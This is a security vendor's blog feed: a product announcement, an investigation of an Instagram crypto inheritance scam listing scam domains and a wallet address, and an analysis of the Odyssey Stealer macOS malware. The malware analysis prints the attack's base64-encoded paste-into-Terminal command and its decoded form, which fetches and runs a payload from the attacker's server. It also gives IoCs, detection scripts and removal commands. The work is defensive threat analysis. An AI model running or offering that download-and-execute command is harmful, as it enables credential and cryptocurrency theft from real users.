Dmytro Grydin – Gridinsoft Blog (https://gridinsoft.com/blogs): posts about security solutions to keep you, your family and business safe.

Beyond Validation: Announcing the Gridinsoft Email Security Checker Upgrade
https://gridinsoft.com/blogs/upgrade-email-security-audit-by-gridinsoft/
Thu, 08 Jan 2026 02:15:13 +0000

In an era where phishing attacks are becoming increasingly sophisticated, simply knowing if an email address exists is no longer enough to ensure safety. Phishing messages often look strikingly real, coming from domains that seem legitimate until you look under the hood.

Today, we are proud to announce a significant leap forward in communication security with the release of the enhanced Gridinsoft Email Security Checker.

Gridinsoft Email Security Checker Upgrade

Not Just a Check, But a Full Audit

We have moved beyond simple syntax validation to a comprehensive 4-Pillar Security Audit. This new engine is designed to provide deep intelligence on every email you analyze, giving you a definitive verdict on whether a message is safe to engage with.

1. Real-Time Technical Verification

Our engine now performs deep-level MX record analysis and SMTP simulation. We don’t just check if the domain exists; we verify if the mailbox is physically active and ready to receive mail, identifying “ghost” accounts often used in automation.

2. AI-Powered Content Analysis

The heart of the upgrade is our new AI analysis engine. By scanning the message body for subtle phishing patterns, social engineering tactics, and fraudulent link structures, our AI provides a contextual safety score. It doesn’t just look for bad words; it understands the intent of the sender.

3. Global Threat Intelligence

Connected to real-time spam blacklists (DNSBL), the checker cross-references every sender against millions of known malicious records. If a sender has a history of fraud, you’ll know instantly.

4. Infrastructure & Reputation Auditing

Scammers often hide behind “burner” or disposable email addresses. Our enhanced detection identifies these high-risk providers and evaluates domain intelligence (like domain age) to flag suspicious “newborn” domains often used in targeted attacks.

A Visual, Actionable Report

Safety shouldn’t be technical or confusing. Our redesigned report provides:

  • Clear Verdicts: Instant color-coded headers (SAFE, SUSPICIOUS, or DANGEROUS).
  • Security Scorecard: A transparent breakdown of the four pillars.
  • Actionable Advice: Direct recommendations like “Safe to reply” or “Do not click links.”

Global Protection, Total Privacy

Gridinsoft is committed to a safer internet for everyone. That’s why the new Email Checker is:

  • Fully Localized: Available in 7 languages (English, Ukrainian, Spanish, Portuguese, German, French, and Chinese).
  • Zero-Tracking: We do not store your message content or track your identity. Every check is strictly anonymous and processed over secure SSL/TLS channels.

Protect Your Inbox Today

The upgraded Email Security Checker is live now and free for all users. Secure your digital communications and stay one step ahead of the scammers.

Try the Email Security Checker Now

The 7 Million USDT Instagram Scam: How Fake Inheritance Messages Lead to Real Losses
https://gridinsoft.com/blogs/the-7-million-usdt-instagram-scam/
Thu, 14 Aug 2025 22:25:00 +0000

Picture this: You’re scrolling through Instagram when a message pops up. Someone claiming to be dying wants to leave you 7 million USDT. They even provide login credentials to prove it’s real. Thousands of users are receiving these messages right now, and some are falling for what has become one of the largest coordinated crypto scams we’ve investigated.

The scam operates through a network of over 60 fake cryptocurrency platforms, all following the same playbook. After digging through victim reports and analyzing the infrastructure, we uncovered how this operation works – and why people keep falling for it despite the obvious red flags.

Following the Digital Trail: How We Found the Scammers

Our investigation started with a simple Instagram DM that one victim shared: “Me llegó por Instagram un mensaje que me hablaba que me dejaba un dinero porque él iba a morir” (I received an Instagram message telling me they were leaving me money because they were going to die). The message came with login credentials to a site called coinvbs.com.

A Ukrainian user told us what happened next: “I was sitting on Instagram when this message came – ‘I have cancer, I don’t have long left, I loved you, so here’s a gift.’ They gave me a login and password. Against my better judgment, I logged in. The balance showed 4 million USDT. To withdraw? They wanted my crypto wallet address and private key. That’s when I knew it was a scam and backed out.”

But here’s where it gets interesting. This wasn’t just one fake site – it’s an entire network. The same scam, the same fake balances, the same cancer story, but spread across dozens of domains that all look like legitimate crypto exchanges. Think of it as a digital hydra – cut off one head, and two more appear.

The attackers provide login credentials to their fake platforms, where victims see tantalizing balances – often exceeding 7 million USDT. One victim reported accessing miryy[.]com: “I entered the username and password and they were correct. Logging into the account, it’s real that it has an asset of 7,000,000 USDT which I cannot withdraw because it asks for a key that only the account creator has.”

Instagram Crypto Inheritance Scam Execution Flow:

  1. Unsolicited DM on Instagram
  2. Emotional story (terminal illness)
  3. Fake credentials to a mir*.com site
  4. Display of a fake balance (7+ million USDT)
  5. Request for a deposit for “verification”
  6. Theft of funds or private keys

The Domain Game: 60+ Fake Sites and Counting

One frustrated victim decided to do their own detective work and shared what they found: “It’s a whole scam network – mirjz.com, mirwf.com, mirvf.com, and many others all claiming to be USDT storage centers. They constantly demand deposits with different excuses. Try to withdraw? More deposits needed. Try to contact someone? You only get a fake customer service rep who’s in on the scam.”

Through victim reports on Gridinsoft’s Website Reputation Checker, we compiled a list of confirmed scam domains. Ready for this? There are over 60 of them:


One smart user got suspicious: “I just wanted to check if this mirmr page was real. They gave me an account with way too much money… I wanted to investigate before doing anything.” That caution? It saved them from becoming another victim.

Notice the pattern? All these domains follow a formula: take “mir” and add random letters, or use “coin” with gibberish, or just grab a two-letter .cc domain. It’s like they’re using a domain name generator set to “scam mode.” When one gets reported and blocked, five new ones pop up. It’s whack-a-mole, but with fake crypto exchanges.

Screenshot of fake USDT inheritance scam website showing 7 million balance
This is what victims see. The sites are identical across all 60+ domains – same layout. The only difference is the domain name in the address bar.

The math here is simple: with 60+ domains running the same scam, even a tiny success rate means big money. Each victim who deposits that “verification fee” of $500-5000 adds up. New domains cost pennies, but the returns? We’re talking serious criminal profit.

Why Do People Fall for This? The Psychology is Fascinating

Let’s be honest – getting a random message about inheriting millions should trigger every scam alarm in your brain. But here’s the thing: these scammers are playing a different game. They’re not just after your money; they’re hacking your emotions first. The cancer story? That’s designed to short-circuit your skepticism with sympathy. It’s social engineering 101, but executed brilliantly.

Then comes the masterstroke – they let you log in and see the money. One victim described it perfectly: “When I logged in, it was real – the account had 7,000,000 USDT.” That visual confirmation is powerful. Your brain sees those numbers and starts believing, even when logic says it’s impossible.

Some people get curious and decide to play detective. One user admitted: “I created an account, I’m testing little by little the deposits and withdrawals to confirm if they’re scammers.” That’s exactly what the criminals want – curiosity leading to “small” test deposits that never come back.

It’s the same psychology behind those fake Elon Musk crypto giveaways – show people money they think is theirs, and watch rational thinking evaporate. By the time they ask for that “tiny” $500 verification fee, victims have already mentally spent their millions. Compared to 7 million USDT, what’s $500, right? That’s the trap.

The Real Cost: Following the Money Trail

Here’s where it gets ugly. The “verification fee” starts at $500-5000, but that’s just the appetizer. Once you pay, suddenly there are “taxes,” “transfer fees,” “account upgrades” – the menu of fake charges keeps growing until your wallet is empty or you wise up.

Mirnj scam site comment
One victim shared their loss: “Scam USDT platform, I lost USDT to this address: TZCFtryJmbCDgs5g5GybZHhqvP4X4DQEEc.” That’s a real blockchain address where real money disappeared.

Another person almost fell for it but caught on just in time: “Got a suspicious DM from an account with a woman’s picture. They said they had cancer and wanted to leave me over 1 million USDT. I don’t even know this person. Obviously a scam.”

But here’s the nightmare scenario: some victims hand over their wallet private keys thinking it’s needed for the “transfer.” Game over. That’s not just losing a deposit – that’s giving criminals the keys to your entire crypto holdings. If you want to understand why that’s so dangerous, check out this piece on how crypto wallets actually get hacked.

The worst part? Most victims never report it. Too embarrassed, too ashamed. The scammers count on this silence to keep operating.

The Bigger Picture: It’s Not Just One Scam

Here’s what our investigation uncovered: this isn’t an isolated operation. The same crew running these inheritance scams? They’re probably behind those fake token presales you’ve been seeing. Same playbook, different story.

The technical setup matches what we’ve seen in fake Binance security alerts and other exchange scams. But adding the dying person angle? That’s new. And unfortunately, it works better than you’d think.

How to Spot This Scam (and Not Become Victim #10,001)

Let’s keep it simple. Here are the dead giveaways:

  • Random crypto inheritance messages = Scam. Every. Single. Time.
  • “I’m dying and want to give you money” = They’re not dying, they want YOUR money
  • Pay to withdraw “your” funds = If it’s yours, why are you paying?
  • They want your private keys = Never. Not even if they claim to be Satoshi Nakamoto himself
  • Domains like mir-whatever[.]com = Check our list above. If it’s there, run.

Before trusting any crypto platform, do your homework. Use tools like Gridinsoft’s Website Reputation Checker to verify if a site is legit. And please, enable 2FA on your Instagram – at least make the scammers work harder.

Got Targeted? Here’s Your Action Plan

If one of these messages lands in your DMs:

  1. Don’t reply – Even saying “no thanks” puts you on their “active user” list
  2. Screenshot everything – Evidence first, then report and block
  3. Report to Instagram – They’re slow, but every report counts
  4. Warn your followers – Post about it. These scammers hate exposure
  5. Lock down your DMs – Check who can message you in settings

Already sent them money? Act fast:

  • Contact your crypto exchange immediately (though honestly, the money’s probably gone)
  • File a police report (they need the data even if they can’t help)
  • Report to IC3.gov if you’re in the US
  • Change ALL your passwords if you downloaded anything they sent
  • Check your devices for malware – these guys sometimes double-dip with trojans

What’s Next for This Scam?

Instagram’s playing catch-up. By the time they ban one account sending these messages, ten more are already active. The mir* domain network? It’ll keep growing. We predict they’ll hit 100+ domains by summer 2025.

The scammers are already evolving. We’re seeing variations with “lottery winnings” and “unclaimed family estates” using the same infrastructure. Next, they’ll probably add AI-generated video messages to make the dying person seem real. The playbook stays the same – only the story changes.

Bottom line: As long as people keep falling for “free money from strangers,” these scams will exist. The only real defense? Education and skepticism. If someone you don’t know wants to give you millions, they don’t. It’s that simple.

Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App
https://gridinsoft.com/blogs/odyssey-stealer-macos-malware/
Wed, 11 Jun 2025 03:13:58 +0000

A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The Odyssey Stealer represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities.

Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories named lovemrtrump – suggesting potential connections to Russian threat actors with apparent political motivations. Most concerning is the malware’s ability to replace legitimate cryptocurrency applications like Ledger Live with trojaned versions, compromising hardware wallet security and stealing private keys during transactions.

The Deception Chain: From Fake Verification to Full Compromise

The attack begins when users are redirected to seemingly legitimate domains like macosx-apps[.]com (macosxappstore[.]com, appmacosx[.]com) displaying convincing Cloudflare-styled verification pages. These pages present users with an “Unusual Web Traffic Detected” warning and request manual verification through terminal commands.

macosx-apps – Fake Cloudflare verification page

The fake verification page instructs users to:

  1. Press Command + Space to open Spotlight
  2. Type “Terminal” and press Return
  3. Copy and paste a provided command
  4. Execute the command to “verify” their legitimacy

What appears to be a simple verification text is actually a base64-encoded malicious command: echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

When decoded, this reveals the true payload: curl -s hxxp[:]//odyssey1[.]to:3333/d?u=october | nohup bash & – a command that downloads and executes an AppleScript stealer from the attacker’s server.
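As an added example (not code from the Gridinsoft post), the bash functions below decode a pasted “verification” one-liner of the shape shown above without ever running it, then flag the download-and-execute traits a responder would look for and defang the embedded URL for reporting. The sample command is the one quoted above; the function names are my own.

```bash
#!/usr/bin/env bash
# Added example, not code from the Gridinsoft post: triage a ClickFix-style
# "verification" command offline. Nothing here executes the decoded payload.
set -u

# Constructed sample: the one-liner the fake Cloudflare page asks the user to paste.
SAMPLE_CMD='echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash'

# Pull the quoted base64 literal out of an `echo "<b64>" | base64 -d | <shell>` chain
# and print the decoded text. Returns 1 when the command does not have that shape.
decode_payload() {
    local cmd="$1" b64
    case "$cmd" in
        *'echo "'*'" | base64 -d'*) ;;
        *) return 1 ;;
    esac
    b64=${cmd#*echo \"}      # strip everything through the opening quote
    b64=${b64%%\"*}          # keep only the quoted literal
    printf '%s' "$b64" | base64 -d 2>/dev/null
}

# Report the traits of a decoded command that mark it as download-and-execute:
# a downloader, a pipe into a shell, backgrounding/detaching, and cleartext HTTP.
triage() {
    local decoded="$1" findings=""
    case "$decoded" in *curl*|*wget*)                        findings="${findings}download;" ;; esac
    case "$decoded" in *"|"*bash*|*"|"*" sh"*|*"|"*zsh*)     findings="${findings}pipe-to-shell;" ;; esac
    case "$decoded" in *nohup*|*"&"*)                        findings="${findings}background;" ;; esac
    case "$decoded" in *"http://"*)                          findings="${findings}cleartext-http;" ;; esac
    printf '%s' "$findings"
}

# Extract the first URL and defang it (http -> hxxp, . -> [.]) so it can be
# pasted into a ticket or blocklist without becoming a clickable link.
defanged_url() {
    printf '%s\n' "$1" | grep -oE 'https?://[^[:space:]|]+' | head -n 1 \
        | sed -e 's/^http/hxxp/' -e 's/\./[.]/g'
}

# Stand-alone run: print the decoded command, its traits and the defanged C2 URL.
if decoded=$(decode_payload "$SAMPLE_CMD"); then
    printf 'decoded : %s\n' "$decoded"
    printf 'traits  : %s\n' "$(triage "$decoded")"
    printf 'c2      : %s\n' "$(defanged_url "$decoded")"
else
    echo "command does not match the echo|base64|shell pattern" >&2
fi
```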

Odyssey Stealer Attack Flow:

  1. User redirected to macosx-apps[.]com, macosxappstore[.]com or appmacosx[.]com (fake Cloudflare page)
  2. Fake verification: “Unusual Traffic” warning with Terminal instructions
  3. Base64 command copied and executed by the user in Terminal
  4. Script download from odyssey1[.]to:3333 (AppleScript payload)
  5. Data collection: browser credentials, wallets, system info
  6. Data exfiltration: ZIP upload to the odyssey1[.]to server
  7. Persistence setup: LaunchDaemon com.love.russia.plist
  8. App replacement: malicious Ledger Live installation
  9. Ongoing control: botnet binary execution loop

High risk: complete system compromise, credential theft, crypto wallet access. Persistence: survives reboots, runs continuously, replaces legitimate applications. Detection: monitor /tmp/lovemrtrump/, network connections to odyssey1[.]to, and LaunchDaemon processes.

Advanced AppleScript Capabilities: Beyond Basic Info-Stealing

The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. The malware employs randomized function names (like f7220708984353234618 and v4763105019481279311) to evade signature-based detection while systematically harvesting sensitive information.

Targeted Data Collection

The stealer focuses on high-value targets across multiple categories:

  • Browser Credentials: Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords
  • Cryptocurrency Wallets: Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications
  • System Information: Collects detailed hardware and software profiles using system_profiler
  • Personal Files: Copies documents from Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key
  • Keychain Access: Steals macOS Keychain databases containing stored passwords and certificates
  • Apple Notes: Extracts and formats Notes data, potentially revealing personal information and security details

Persistence and Privilege Escalation

The malware establishes multiple persistence mechanisms to maintain long-term access:

  • LaunchDaemon Installation: Creates /Library/LaunchDaemons/com.love.russia.plist to ensure automatic execution at boot
  • Botnet Binary: Downloads and installs a secondary payload (~/.init) that runs continuously
  • Social Engineering for Sudo: Prompts users with fake “Application Helper” dialogs to obtain administrator passwords
  • Application Replacement: Can replace legitimate applications like Ledger Live with malicious versions

Technical Analysis: Obfuscation and Anti-Detection

The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical commodity info-stealers like Lumma. Unlike traditional malware that relies on compiled binaries, this threat leverages AppleScript’s legitimate system access to fly under the radar.

Key Technical Features

Component | Function | Impact
Variable Obfuscation | Random 19-digit function/variable names | Evades signature detection
Error Handling | Comprehensive try-catch blocks | Prevents crashes, maintains stealth
File Exclusions | Skips .DS_Store, Cache, temp files | Reduces detection, optimizes exfiltration
Cleanup Routines | Removes temporary files post-exfiltration | Eliminates forensic evidence
Retry Mechanism | 10 upload attempts with 60s delays | Ensures successful data theft

Cryptocurrency Focus: The Primary Target

Like many modern stealers, Odyssey specifically targets cryptocurrency assets with precision similar to Meta Infostealer campaigns. The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.

High-priority targets include:

  • MetaMask: The most common Ethereum wallet extension
  • BNB Chain Wallet: Binance Smart Chain access
  • Hardware Wallet Interfaces: Ledger Live, Trezor Suite
  • Desktop Wallets: Electrum, Exodus, Atomic Wallet
  • Exchange Applications: Binance desktop, TonKeeper

The malware’s application replacement capability is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, potentially compromising hardware wallet interactions and stealing private keys during transactions.

The Ledger Live Trojan: Hardware Wallet Compromise

One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This supply-chain attack works by:

  • Application Termination: Killing any running Ledger Live processes
  • File Replacement: Removing the legitimate /Applications/Ledger Live.app
  • Malicious Installation: Downloading and installing a trojaned version from hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
  • Seamless Operation: The fake application appears identical to users while capturing private keys and transaction data

This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. However, if the companion software is compromised, attackers can potentially intercept private keys, seed phrases, and transaction details even from hardware-secured wallets. The trojaned Ledger Live app could capture sensitive information during device setup, firmware updates, or transaction signing processes.

Indicators of Compromise (IoCs)

Network Indicators

  • C2 Server: odyssey1[.]to:3333
  • Download URL: hxxp[:]//odyssey1[.]to:3333/d?u=october
  • Fake Domain: macosx-apps[.]com, macosxappstore[.]com, appmacosx[.]com
  • Asset Download: hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
  • Botnet Binary: hxxp[:]//odyssey1[.]to/otherassets/botnet

File System Artifacts

  • Staging Directory: /tmp/lovemrtrump/
  • Exfiltration Archive: /tmp/out.zip
  • Persistence: /Library/LaunchDaemons/com.love.russia.plist
  • User Files: ~/.username, ~/.pwd, ~/.init, ~/.start
  • Data Collection: /tmp/lovemrtrump/finder/, /tmp/lovemrtrump/deskwallets/

Detection and Removal Guide

If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.

Immediate Detection Steps

  1. Check for Active Processes:
            ps aux | grep -E "(odyssey|lovemrtrump|\.init)"
            launchctl list | grep "com.love.russia"
            
  2. Inspect File System:
            ls -la /tmp/lovemrtrump/
            ls -la /Library/LaunchDaemons/com.love.russia.plist
            ls -la ~/.init ~/.start ~/.username ~/.pwd
            
  3. Check Network Connections:
            # netstat -n prints numeric addresses, so match the C2 port rather than the hostname
            netstat -an | grep ":3333"
            # lsof -i resolves peer names, so the C2 hostname can be matched here
            lsof -i | grep -i "odyssey1"
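The checklist above can be turned into a single read-only audit script. The one below is an added example, not the post’s own tooling: it checks the file-system indicators from the IoC list against any root (the live disk, a mounted image, or a test tree), runs the launchd, process, socket and Ledger Live code-signature checks only when those tools exist, and deletes nothing. Function names and the --live flag are my own.

```bash
#!/usr/bin/env bash
# Added example, not the post's own script: a read-only audit for the Odyssey Stealer
# artifacts listed above. It deletes nothing, so it is safe to run before any cleanup.
set -u

# Host-wide paths from the post's IoC list (staging dir, archives, LaunchDaemon).
ODYSSEY_SYSTEM_PATHS="/tmp/lovemrtrump /tmp/out.zip /tmp/ledger.zip /tmp/starter \
/Library/LaunchDaemons/com.love.russia.plist"
# Dotfiles the stealer drops in the victim's home directory.
ODYSSEY_USER_FILES=".init .start .username .pwd"

# Print one "ARTIFACT <path>" line per hit. ROOT (default "", i.e. the live disk) and
# USER_HOME (default $HOME) let the check run against a mounted image or a test tree.
find_odyssey_artifacts() {
    local root="${1:-}" home="${2:-${HOME:-}}" p f
    for p in $ODYSSEY_SYSTEM_PATHS; do
        [ -e "$root$p" ] && echo "ARTIFACT $root$p"
    done
    for f in $ODYSSEY_USER_FILES; do
        [ -e "$home/$f" ] && echo "ARTIFACT $home/$f"
    done
    return 0
}

# Number of artifacts found, as a plain integer on stdout (0 when the tree is clean).
count_odyssey_artifacts() {
    find_odyssey_artifacts "$@" | awk '/^ARTIFACT /{n++} END{print n+0}'
}

# Live checks that only make sense on the running Mac: loaded launchd jobs, running
# processes, open sockets, and the Ledger Live code signature. Each tool is optional.
live_odyssey_checks() {
    if command -v launchctl >/dev/null; then
        launchctl list 2>/dev/null | grep -q "com.love.russia" && echo "LOADED com.love.russia"
    fi
    # pgrep excludes itself, unlike `ps | grep`, which would match its own pattern.
    pgrep -f 'lovemrtrump|/\.init' >/dev/null 2>&1 && echo "PROCESS odyssey-related"
    if command -v lsof >/dev/null; then
        # lsof -i resolves peer names, so the C2 hostname is visible; the port is also
        # checked because odyssey1[.]to serves the payload on 3333.
        lsof -i 2>/dev/null | grep -Eiq 'odyssey1|:3333' && echo "NETWORK odyssey1/3333"
    fi
    if command -v codesign >/dev/null && [ -d "/Applications/Ledger Live.app" ]; then
        # A replaced app will not carry a valid signature; a clean install passes --strict.
        codesign --verify --deep --strict "/Applications/Ledger Live.app" 2>/dev/null \
            || echo "SIGNATURE Ledger Live failed verification"
    fi
    return 0
}

# Stand-alone run: pass --live to audit this machine rather than a supplied tree.
if [ "${1:-}" = "--live" ]; then
    find_odyssey_artifacts "" "${HOME:-}"
    live_odyssey_checks
    echo "total artifacts: $(count_odyssey_artifacts "" "${HOME:-}")"
fi
```

A non-zero artifact count is a reason to image the machine before running the removal steps, so the evidence survives the cleanup.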
            

Manual Removal Process

Warning: Manual removal requires administrative privileges and careful execution. For comprehensive cleanup, we recommend using professional security tools.

  1. Stop Malicious Processes:
            sudo launchctl unload /Library/LaunchDaemons/com.love.russia.plist
            sudo pkill -f "\.init"
            sudo pkill -f "lovemrtrump"
            
  2. Remove Persistence Mechanisms:
            sudo rm -f /Library/LaunchDaemons/com.love.russia.plist
            rm -f ~/.init ~/.start ~/.username ~/.pwd
            
  3. Clean Temporary Files:
            sudo rm -rf /tmp/lovemrtrump/
            sudo rm -f /tmp/out.zip
            sudo rm -f /tmp/ledger.zip
            sudo rm -f /tmp/starter
            
  4. Verify Application Integrity:
            # Check if Ledger Live was replaced
            ls -la "/Applications/Ledger Live.app"
            # Reinstall from official source if suspicious
            

Post-Infection Security Measures

After removing the malware, implement these critical security steps:

Immediate Actions

  • Change All Passwords: Update passwords for all accounts, especially financial and cryptocurrency services
  • Review Financial Accounts: Check bank statements, credit reports, and cryptocurrency wallet balances
  • Enable 2FA: Activate two-factor authentication on all sensitive accounts
  • Monitor Credit Reports: Set up fraud alerts with credit bureaus

Browser Security

  • Clear Browser Data: Remove all saved passwords, cookies, and form data
  • Reinstall Extensions: Remove and reinstall all browser extensions, especially wallet-related ones
  • Update Browsers: Ensure all browsers are running the latest versions
  • Review Permissions: Audit browser extension permissions and remove unnecessary access

Cryptocurrency Security

  • Create New Wallets: Generate new wallet addresses and transfer funds from potentially compromised wallets
  • Hardware Wallet Reset: If using hardware wallets, perform a full reset and restore from backup
  • Verify Applications: Reinstall all cryptocurrency applications from official sources
  • Monitor Transactions: Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity

The Broader Threat Landscape

The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. Unlike previous campaigns that relied on social engineering or software vulnerabilities, this threat combines legitimate system tools with deception to bypass traditional security measures.

This attack shares characteristics with other recent campaigns targeting Mac users, including RustBucket malware and various cross-platform stealers. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users’ trust in system dialogs and terminal commands.

The campaign’s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, which often lack the same fraud protection mechanisms as traditional financial institutions.

Geopolitical Implications: The Russia Connection

The malware’s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as com.love.russia.plist in the system’s LaunchDaemons directory, while staging stolen data in a folder named lovemrtrump. These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users.

The combination of Russian nomenclature and cryptocurrency theft capabilities aligns with patterns observed in other state-sponsored or politically motivated cybercrime operations. The specific targeting of hardware wallet applications like Ledger Live suggests a deep understanding of Western cryptocurrency infrastructure and user behavior patterns.

Conclusion

The Odyssey Stealer’s distinctive characteristics – from its Russian-themed persistence mechanisms (com.love.russia.plist, lovemrtrump directories) to its specific targeting of hardware wallet applications like Ledger Live – suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety.

Mac users must remain vigilant against these evolving threats, particularly those involving terminal commands or system-level access requests. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.

As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation requests.

The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas.
